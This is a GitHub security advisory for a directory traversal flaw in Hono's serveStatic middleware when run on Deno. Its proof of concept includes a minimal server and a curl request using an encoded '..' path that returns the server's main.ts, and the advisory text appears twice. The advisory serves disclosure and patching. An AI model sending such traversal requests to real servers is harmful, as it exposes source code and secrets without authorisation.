Headline
GHSA-3mpf-rcc7-5347: Hono vulnerable to Restricted Directory Traversal in serveStatic with deno
Summary
When using serveStatic with deno, it is possible to directory traverse where main.ts is located.
My environment is configured as per this tutorial https://hono.dev/getting-started/deno
PoC
$ tree
.
├── deno.json
├── deno.lock
├── main.ts
├── README.md
└── static
└── a.txt
source
import { Hono } from 'https://deno.land/x/[email protected]/mod.ts'
import { serveStatic } from 'https://deno.land/x/[email protected]/middleware.ts'
const app = new Hono()
app.use('/static/*', serveStatic({ root: './' }))
Deno.serve(app.fetch)
request
curl localhost:8000/static/%2e%2e/main.ts
response is content of main.ts
Impact
Unexpected files are retrieved.
Summary
When using serveStatic with deno, it is possible to directory traverse where main.ts is located.
My environment is configured as per this tutorial
https://hono.dev/getting-started/deno
PoC
$ tree . ├── deno.json ├── deno.lock ├── main.ts ├── README.md └── static └── a.txt
source
import { Hono } from ‘https://deno.land/x/[email protected]/mod.ts’ import { serveStatic } from ‘https://deno.land/x/[email protected]/middleware.ts’
const app = new Hono() app.use('/static/*’, serveStatic({ root: ‘./’ }))
Deno.serve(app.fetch)
request
curl localhost:8000/static/%2e%2e/main.ts
response is content of main.ts
Impact
Unexpected files are retrieved.
References
- GHSA-3mpf-rcc7-5347
- honojs/hono@92e65fb